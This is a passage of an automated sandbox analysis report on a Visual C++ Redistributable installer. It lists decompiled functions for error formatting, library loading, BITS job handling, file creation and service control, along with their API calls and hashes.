                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
                                                                          • String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
                                                                          • API String ID: 2084161155-3906113122
                                                                          • Opcode ID: a0bdc4af09343d34881ad29dedbe4a6be533c4fcf0d10e75095a2a7cc5b3d659
                                                                          • Instruction ID: f261647ad91411416ab5f0b52de1b1cc7d3ac1c687e510868d723d48d6ab231b
                                                                          • Opcode Fuzzy Hash: a0bdc4af09343d34881ad29dedbe4a6be533c4fcf0d10e75095a2a7cc5b3d659
                                                                          • Instruction Fuzzy Hash: 87017C31940A28FADB22A690DC0BBDF7A689B00766F104156F900BE192DAB59A849791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00011F78(void* __ecx, intOrPtr _a4, long _a8, void* _a12, char _a16) {
                                                                          				short _v8;
                                                                          				char* _v12;
                                                                          				long _t16;
                                                                          				void* _t30;
                                                                          
                                                                          				_v8 = 0;
                                                                          				_t15 =  !=  ? 0x19ff : 0x11ff;
                                                                          				_v12 =  &_a16;
                                                                          				_t16 = FormatMessageW( !=  ? 0x19ff : 0x11ff, _a12, _a8, 0,  &_v8, 0,  &_v12);
                                                                          				_v12 = 0;
                                                                          				if(_t16 != 0) {
                                                                          					_t30 = E000121A5(_a4, _v8, _t16);
                                                                          				} else {
                                                                          					_t34 =  <=  ? GetLastError() : _t20 & 0x0000ffff | 0x80070000;
                                                                          					_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t20 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "strutil.cpp", 0x489, _t30);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					LocalFree(_v8);
                                                                          				}
                                                                          				return _t30;
                                                                          			}








                                                                          APIs
                                                                          • FormatMessageW.KERNEL32(000011FF,00015386,?,00000000,00000000,00000000,?,80070656,?,?,?,0002E50B,00000000,00015386,00000000,80070656), ref: 00011FAA
                                                                          • GetLastError.KERNEL32(?,?,?,0002E50B,00000000,00015386,00000000,80070656,?,?,00023F6B,00015386,?,80070656,00000001,crypt32.dll), ref: 00011FB7
                                                                          • LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,0002E50B,00000000,00015386,00000000,80070656,?,?,00023F6B,00015386), ref: 00011FFE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFormatFreeLastLocalMessage
                                                                          • String ID: @Met$strutil.cpp
                                                                          • API String ID: 1365068426-569070560
                                                                          • Opcode ID: 5940ce2540c3c6bb73be67c10b53ffcf6a22d3d17cd516bafe4ccaaf474b216b
                                                                          • Instruction ID: a7aef618add7ed6b2bfbc4026c2d56e5d2d3ed03adb5a9f139fd58d31b720e43
                                                                          • Opcode Fuzzy Hash: 5940ce2540c3c6bb73be67c10b53ffcf6a22d3d17cd516bafe4ccaaf474b216b
                                                                          • Instruction Fuzzy Hash: 39116176901229FFEB259F94CC09AEF7AA8EF08341F004169FE01E2150E7759E51D7E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 95%
                                                                          			E00048731(signed int _a4) {
                                                                          				signed int _t9;
                                                                          				void* _t13;
                                                                          				signed int _t15;
                                                                          				WCHAR* _t22;
                                                                          				signed int _t24;
                                                                          				signed int* _t25;
                                                                          				void* _t27;
                                                                          
                                                                          				_t9 = _a4;
                                                                          				_t25 = 0x7b4d8 + _t9 * 4;
                                                                          				_t24 =  *_t25;
                                                                          				if(_t24 == 0) {
                                                                          					_t22 =  *(0x71d50 + _t9 * 4);
                                                                          					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                          					if(_t27 != 0) {
                                                                          						L8:
                                                                          						 *_t25 = _t27;
                                                                          						if( *_t25 != 0) {
                                                                          							FreeLibrary(_t27);
                                                                          						}
                                                                          						_t13 = _t27;
                                                                          						L11:
                                                                          						return _t13;
                                                                          					}
                                                                          					_t15 = GetLastError();
                                                                          					if(_t15 != 0x57) {
                                                                          						_t27 = 0;
                                                                          					} else {
                                                                          						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                          						_t27 = _t15;
                                                                          					}
                                                                          					if(_t27 != 0) {
                                                                          						goto L8;
                                                                          					} else {
                                                                          						 *_t25 = _t15 | 0xffffffff;
                                                                          						_t13 = 0;
                                                                          						goto L11;
                                                                          					}
                                                                          				}
                                                                          				_t4 = _t24 + 1; // 0xfbf51acc
                                                                          				asm("sbb eax, eax");
                                                                          				return  ~_t4 & _t24;
                                                                          			}











                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000488D5,00000000,00000000,?,000486D8,000488D5,00000000,00000000,00000000,?,000488D5,00000006,FlsSetValue), ref: 00048763
                                                                          • GetLastError.KERNEL32(?,000486D8,000488D5,00000000,00000000,00000000,?,000488D5,00000006,FlsSetValue,00072208,00072210,00000000,00000364,?,00046130), ref: 0004876F
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000486D8,000488D5,00000000,00000000,00000000,?,000488D5,00000006,FlsSetValue,00072208,00072210,00000000), ref: 0004877D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad$ErrorLast
                                                                          • String ID: @Met
                                                                          • API String ID: 3177248105-2381362037
                                                                          • Opcode ID: eb57b6e5f09fb886807a76d0afdad5f76f2bc530fb29a25c7b78f21bc34ea690
                                                                          • Instruction ID: 6519f445cf08b9c658bcdc05b9bc68f3f76b9c1dbee81296b900e9b69db8fcc8
                                                                          • Opcode Fuzzy Hash: eb57b6e5f09fb886807a76d0afdad5f76f2bc530fb29a25c7b78f21bc34ea690
                                                                          • Instruction Fuzzy Hash: BC01FC766153265BD7314B699C58A6F3798AF047A1B304A30F906E3140DB24DC01C7E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 35%
                                                                          			E0003D7CC(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                          				char _v8;
                                                                          				void* _t21;
                                                                          				intOrPtr* _t22;
                                                                          				void* _t29;
                                                                          				intOrPtr _t30;
                                                                          				void* _t32;
                                                                          				intOrPtr _t33;
                                                                          
                                                                          				_t30 = _a4;
                                                                          				_v8 = 4;
                                                                          				EnterCriticalSection(_t30 + 8);
                                                                          				_t22 = _a8;
                                                                          				_t33 =  *((intOrPtr*)( *_t22 + 0x38))(_t22,  &_v8, _t29, _t32, _t21, __ecx);
                                                                          				if(_t33 >= 0) {
                                                                          					if(_v8 == 2) {
                                                                          						_t33 = E0003D9C1(_t30, _t22);
                                                                          						if(_t33 < 0) {
                                                                          							_push("Failure while sending progress during BITS job modification.");
                                                                          							goto L5;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to get state during job modification.");
                                                                          					L5:
                                                                          					_push(_t33);
                                                                          					E0005012F();
                                                                          				}
                                                                          				LeaveCriticalSection(_t30 + 8);
                                                                          				if(_t33 < 0) {
                                                                          					 *(_t30 + 0x20) =  *(_t30 + 0x20) & 0x00000000;
                                                                          					 *((intOrPtr*)(_t30 + 0x24)) = _t33;
                                                                          					SetEvent( *(_t30 + 0x28));
                                                                          				}
                                                                          				return 0;
                                                                          			}










                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0003D7E1
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0003D826
                                                                          • SetEvent.KERNEL32(?,?,?,?), ref: 0003D83A
                                                                          Strings
                                                                          • Failed to get state during job modification., xrefs: 0003D7FA
                                                                          • Failure while sending progress during BITS job modification., xrefs: 0003D815
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterEventLeave
                                                                          • String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
                                                                          • API String ID: 3094578987-1258544340
                                                                          • Opcode ID: 3777e9739d662147ca790ef121b1e2211b76326363e4fc189e168c71a517170e
                                                                          • Instruction ID: 54e5f2683af5423fca9a8a1ad7e9163cb0b81063abaf2e39701df11a005be05b
                                                                          • Opcode Fuzzy Hash: 3777e9739d662147ca790ef121b1e2211b76326363e4fc189e168c71a517170e
                                                                          • Instruction Fuzzy Hash: F5019272900615FBCB129B55E849AAEB7ACFF08331F004216E804D7600DB35FD14CBD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 71%
                                                                          			E0004605E(void* __ebx, void* __ecx, void* __edx) {
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				intOrPtr _t2;
                                                                          				void* _t3;
                                                                          				void* _t4;
                                                                          				intOrPtr _t9;
                                                                          				void* _t11;
                                                                          				void* _t20;
                                                                          				void* _t21;
                                                                          				void* _t23;
                                                                          				void* _t25;
                                                                          				void* _t27;
                                                                          				void* _t29;
                                                                          				void* _t30;
                                                                          				void* _t31;
                                                                          				void* _t32;
                                                                          				long _t36;
                                                                          				long _t37;
                                                                          				void* _t40;
                                                                          
                                                                          				_t29 = __edx;
                                                                          				_t23 = __ecx;
                                                                          				_t20 = __ebx;
                                                                          				_push(_t30);
                                                                          				_t36 = GetLastError();
                                                                          				_t2 =  *0x7a05c; // 0x6
                                                                          				_t42 = _t2 - 0xffffffff;
                                                                          				if(_t2 == 0xffffffff) {
                                                                          					L2:
                                                                          					_t3 = E0004523F(_t23, 1, 0x364);
                                                                          					_t31 = _t3;
                                                                          					_pop(_t25);
                                                                          					if(_t31 != 0) {
                                                                          						_t4 = E000488AE(_t20, _t25, _t31, __eflags,  *0x7a05c, _t31);
                                                                          						__eflags = _t4;
                                                                          						if(_t4 != 0) {
                                                                          							E00045ED0(_t25, _t31, 0x7b13c);
                                                                          							E0004511A(0);
                                                                          							_t40 = _t40 + 0xc;
                                                                          							__eflags = _t31;
                                                                          							if(_t31 == 0) {
                                                                          								goto L9;
                                                                          							} else {
                                                                          								goto L8;
                                                                          							}
                                                                          						} else {
                                                                          							_push(_t31);
                                                                          							goto L4;
                                                                          						}
                                                                          					} else {
                                                                          						_push(_t3);
                                                                          						L4:
                                                                          						E0004511A();
                                                                          						_pop(_t25);
                                                                          						L9:
                                                                          						SetLastError(_t36);
                                                                          						E000451FC(_t20, _t25, _t29, _t36);
                                                                          						asm("int3");
                                                                          						_push(_t20);
                                                                          						_push(_t36);
                                                                          						_push(_t31);
                                                                          						_t37 = GetLastError();
                                                                          						_t21 = 0;
                                                                          						_t9 =  *0x7a05c; // 0x6
                                                                          						_t45 = _t9 - 0xffffffff;
                                                                          						if(_t9 == 0xffffffff) {
                                                                          							L12:
                                                                          							_t32 = E0004523F(_t25, 1, 0x364);
                                                                          							_pop(_t27);
                                                                          							if(_t32 != 0) {
                                                                          								_t11 = E000488AE(_t21, _t27, _t32, __eflags,  *0x7a05c, _t32);
                                                                          								__eflags = _t11;
                                                                          								if(_t11 != 0) {
                                                                          									E00045ED0(_t27, _t32, 0x7b13c);
                                                                          									E0004511A(_t21);
                                                                          									__eflags = _t32;
                                                                          									if(_t32 != 0) {
                                                                          										goto L19;
                                                                          									} else {
                                                                          										goto L18;
                                                                          									}
                                                                          								} else {
                                                                          									_push(_t32);
                                                                          									goto L14;
                                                                          								}
                                                                          							} else {
                                                                          								_push(_t21);
                                                                          								L14:
                                                                          								E0004511A();
                                                                          								L18:
                                                                          								SetLastError(_t37);
                                                                          							}
                                                                          						} else {
                                                                          							_t32 = E00048858(0, _t25, _t31, _t45, _t9);
                                                                          							if(_t32 != 0) {
                                                                          								L19:
                                                                          								SetLastError(_t37);
                                                                          								_t21 = _t32;
                                                                          							} else {
                                                                          								goto L12;
                                                                          							}
                                                                          						}
                                                                          						return _t21;
                                                                          					}
                                                                          				} else {
                                                                          					_t31 = E00048858(__ebx, _t23, _t30, _t42, _t2);
                                                                          					if(_t31 != 0) {
                                                                          						L8:
                                                                          						SetLastError(_t36);
                                                                          						return _t31;
                                                                          					} else {
                                                                          						goto L2;
                                                                          					}
                                                                          				}
                                                                          			}






















                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000000,000419F5,00000000,80004004,?,00041CF9,00000000,80004004,00000000,00000000), ref: 00046062
                                                                          • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 000460CA
                                                                          • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 000460D6
                                                                          • _abort.LIBCMT ref: 000460DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$_abort
                                                                          • String ID: @Met
                                                                          • API String ID: 88804580-2381362037
                                                                          • Opcode ID: 5397ae64d9e2471a56adf477c6eb59cbd8e51bfaef417994847199c7bada4c8a
                                                                          • Instruction ID: 3b92537d3c725f417c675b57f375592f74f3d67b73e2813c986aadafb9d534d3
                                                                          • Opcode Fuzzy Hash: 5397ae64d9e2471a56adf477c6eb59cbd8e51bfaef417994847199c7bada4c8a
                                                                          • Instruction Fuzzy Hash: CBF0D1F2500A0067D36236746C0AB9F269A9BC3732F240639F919A2193FE299C01417E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E0003DA45(void* __ecx, intOrPtr* _a4) {
                                                                          				char _v8;
                                                                          				struct _CRITICAL_SECTION* _t15;
                                                                          				void* _t18;
                                                                          				intOrPtr* _t19;
                                                                          				void* _t26;
                                                                          				void* _t27;
                                                                          				void* _t29;
                                                                          				intOrPtr _t30;
                                                                          
                                                                          				_t27 = __ecx;
                                                                          				_v8 = 4;
                                                                          				_t2 = _t27 + 8; // 0x8
                                                                          				EnterCriticalSection(_t2);
                                                                          				_t19 = _a4;
                                                                          				_t30 =  *((intOrPtr*)( *_t19 + 0x38))(_t19,  &_v8, _t26, _t29, _t18, __ecx);
                                                                          				if(_t30 >= 0) {
                                                                          					if(_v8 != 2) {
                                                                          						_t30 = E0003D9C1(_t27, _t19);
                                                                          						if(_t30 < 0) {
                                                                          							_push("Failure while sending progress.");
                                                                          							goto L5;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to get BITS job state.");
                                                                          					L5:
                                                                          					_push(_t30);
                                                                          					E0005012F();
                                                                          				}
                                                                          				_t7 = _t27 + 8; // 0x8
                                                                          				_t15 = _t7;
                                                                          				LeaveCriticalSection(_t15);
                                                                          				if(_t30 < 0) {
                                                                          					 *(_t27 + 0x20) =  *(_t27 + 0x20) & 0x00000000;
                                                                          					 *((intOrPtr*)(_t27 + 0x24)) = _t30;
                                                                          					_t15 = SetEvent( *(_t27 + 0x28));
                                                                          				}
                                                                          				return _t15;
                                                                          			}












                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,0003DBB5), ref: 0003DA59
                                                                          • LeaveCriticalSection.KERNEL32(00000008,?,0003DBB5), ref: 0003DA9E
                                                                          • SetEvent.KERNEL32(?,?,0003DBB5), ref: 0003DAB2
                                                                          Strings
                                                                          • Failed to get BITS job state., xrefs: 0003DA72
                                                                          • Failure while sending progress., xrefs: 0003DA8D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterEventLeave
                                                                          • String ID: Failed to get BITS job state.$Failure while sending progress.
                                                                          • API String ID: 3094578987-2876445054
                                                                          • Opcode ID: e36274acce0524c045902f67f1d169261fbd15d01090e51e60a3ca00b3f10cb0
                                                                          • Instruction ID: e86d8d9dc4e13ef6755f3116e5f28e7db20721b81612b292fcf193c7aefa8026
                                                                          • Opcode Fuzzy Hash: e36274acce0524c045902f67f1d169261fbd15d01090e51e60a3ca00b3f10cb0
                                                                          • Instruction Fuzzy Hash: 8F01B172A04A25BBC712DB55E949DAEB7ACFF04322F000257F90997610DB75ED0487DA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00054C67(void* __ecx, WCHAR* _a4, long _a8, intOrPtr _a12, intOrPtr _a16, void** _a20) {
                                                                          				void** _t10;
                                                                          				void* _t14;
                                                                          				void* _t15;
                                                                          				void* _t16;
                                                                          
                                                                          				_t14 = __ecx;
                                                                          				_t15 = CreateFileW(_a4, 0x40000000, 1, 0, 2, _a8, 0);
                                                                          				if(_t15 != 0xffffffff) {
                                                                          					_t16 = E00054CEE(_t14, _t15, _a12, _a16);
                                                                          					if(_t16 >= 0) {
                                                                          						_t10 = _a20;
                                                                          						if(_t10 != 0) {
                                                                          							 *_t10 = _t15;
                                                                          							_t15 = _t15 | 0xffffffff;
                                                                          						}
                                                                          					}
                                                                          					if(_t15 != 0xffffffff) {
                                                                          						CloseHandle(_t15);
                                                                          					}
                                                                          				} else {
                                                                          					_t19 =  <=  ? GetLastError() : _t11 & 0x0000ffff | 0x80070000;
                                                                          					_t16 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t11 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "fileutil.cpp", 0x3c2, _t16);
                                                                          				}
                                                                          				return _t16;
                                                                          			}








                                                                          APIs
                                                                          • CreateFileW.KERNEL32(0005B4F0,40000000,00000001,00000000,00000002,00000080,00000000,00020328,00000000,?,0001F37F,?,00000080,0005B4F0,00000000), ref: 00054C7F
                                                                          • GetLastError.KERNEL32(?,0001F37F,?,00000080,0005B4F0,00000000,?,00020328,?,00000094,?,?,?,?,?,00000000), ref: 00054C8C
                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,0001F37F,?,0001F37F,?,00000080,0005B4F0,00000000,?,00020328,?,00000094), ref: 00054CE0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 2528220319-2299628883
                                                                          • Opcode ID: 91623fd1642f24f342a96506c34feb727c7c36fc6e43124f840e98ab7b8802cd
                                                                          • Instruction ID: 3427c8fe50ad74e12045cea0e4324b522fb40e37a0bd866ccf6e315a73b44fa0
                                                                          • Opcode Fuzzy Hash: 91623fd1642f24f342a96506c34feb727c7c36fc6e43124f840e98ab7b8802cd
                                                                          • Instruction Fuzzy Hash: 5401A732B013246BE7715EA99C05FDB3E99DB817B5F014211FE25AB1E0C735DC6197A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00054840(void* __ecx, WCHAR* _a4, intOrPtr _a8) {
                                                                          				void* _t4;
                                                                          				void* _t14;
                                                                          				void* _t16;
                                                                          				void* _t18;
                                                                          
                                                                          				_t14 = __ecx;
                                                                          				if(_a4 != 0) {
                                                                          					_t16 = CreateFileW(_a4, 0x80, 1, 0, 3, 0x80, 0);
                                                                          					if(_t16 != 0xffffffff) {
                                                                          						_t18 = E000548CB(_t14, _t16, _a8);
                                                                          						CloseHandle(_t16);
                                                                          					} else {
                                                                          						_t21 =  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
                                                                          						_t18 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "fileutil.cpp", 0x228, _t18);
                                                                          					}
                                                                          				} else {
                                                                          					_t18 = 0x80070057;
                                                                          					E000137D3(_t4, "fileutil.cpp", 0x223, 0x80070057);
                                                                          				}
                                                                          				return _t18;
                                                                          			}








                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,00038A30,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 00054874
                                                                          • GetLastError.KERNEL32(?,00038A30,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,userVersion,000002C0,000000B0), ref: 00054881
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorFileLast
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 1214770103-2299628883
                                                                          • Opcode ID: 29ecada04a38ea52115c849d0c92eae1c3316fec5a74cfee5078af54f159ad7b
                                                                          • Instruction ID: 79655c183040c1adc6e0771cc46a1fa24c2ca3d6f13a783f4301dc787ae59772
                                                                          • Opcode Fuzzy Hash: 29ecada04a38ea52115c849d0c92eae1c3316fec5a74cfee5078af54f159ad7b
                                                                          • Instruction Fuzzy Hash: C701F932B40720BAF73026E4AC49FFF3688DB40BA6F014221FE05AF1D0CA695D8496F4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 61%
                                                                          			E000369A8(void* __ebx, void* _a4) {
                                                                          				signed int _v8;
                                                                          				struct _SERVICE_STATUS _v36;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t7;
                                                                          				signed short _t15;
                                                                          				void* _t19;
                                                                          				signed int _t20;
                                                                          				void* _t27;
                                                                          				void* _t28;
                                                                          				int _t29;
                                                                          				signed int _t33;
                                                                          
                                                                          				_t19 = __ebx;
                                                                          				_t7 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t7 ^ _t33;
                                                                          				_t26 = _a4;
                                                                          				_t20 = 7;
                                                                          				_t27 =  &_v36;
                                                                          				_t29 = 0;
                                                                          				memset(_t27, 0, _t20 << 2);
                                                                          				_t28 = _t27 + _t20;
                                                                          				if(ControlService(_a4, 1,  &_v36) == 0) {
                                                                          					_t15 = GetLastError();
                                                                          					_t32 =  <=  ? _t15 : _t15 & 0x0000ffff | 0x80070000;
                                                                          					_t29 =  >=  ? 0x80004005 :  <=  ? _t15 : _t15 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "msuengine.cpp", 0x1fc, _t29);
                                                                          					_push("Failed to stop wusa service.");
                                                                          					_push(_t29);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return E0003DE36(_t19, _v8 ^ _t33, _t26, _t28, _t29);
                                                                          			}

















                                                                          APIs
                                                                          • ControlService.ADVAPI32(000368BA,00000001,?,00000001,00000000,?,?,?,?,?,?,000368BA,00000000), ref: 000369D0
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,000368BA,00000000), ref: 000369DA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ControlErrorLastService
                                                                          • String ID: @Met$Failed to stop wusa service.$msuuser.cpp
                                                                          • API String ID: 4114567744-210560903
                                                                          • Opcode ID: 3574237a9441289d161a9537ed7f09392e9db6a189eabc87f81086e9415b8fd4
                                                                          • Instruction ID: 2b09c1dc06e22594ee4fcde655fce14f761c76b461e4e974577483e89bdd0421
                                                                          • Opcode Fuzzy Hash: 3574237a9441289d161a9537ed7f09392e9db6a189eabc87f81086e9415b8fd4
                                                                          • Instruction Fuzzy Hash: EA01DB72B403246BE710ABB5AC05BEB77E9DF48711F01412AFD04FB1C0DA249D4586D5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 45%
                                                                          			E0001D39D(intOrPtr _a4, intOrPtr* _a8) {
                                                                          				intOrPtr* _t10;
                                                                          				long _t15;
                                                                          				long _t18;
                                                                          				intOrPtr _t19;
                                                                          
                                                                          				_t19 = _a4;
                                                                          				_t18 = 0;
                                                                          				_t2 = _t19 + 0x18; // 0xd0
                                                                          				EnterCriticalSection(_t2);
                                                                          				_t3 = _t19 + 0x30; // 0xe8
                                                                          				_t15 = 1;
                                                                          				if(InterlockedCompareExchange(_t3, 1, 0) != 0) {
                                                                          					_t15 = 0;
                                                                          					_t18 = 0x8007139f;
                                                                          				}
                                                                          				_t4 = _t19 + 0x18; // 0xd0
                                                                          				LeaveCriticalSection(_t4);
                                                                          				_t10 = _a8;
                                                                          				if(_t10 != 0) {
                                                                          					 *_t10 = _t15;
                                                                          				}
                                                                          				if(_t18 < 0) {
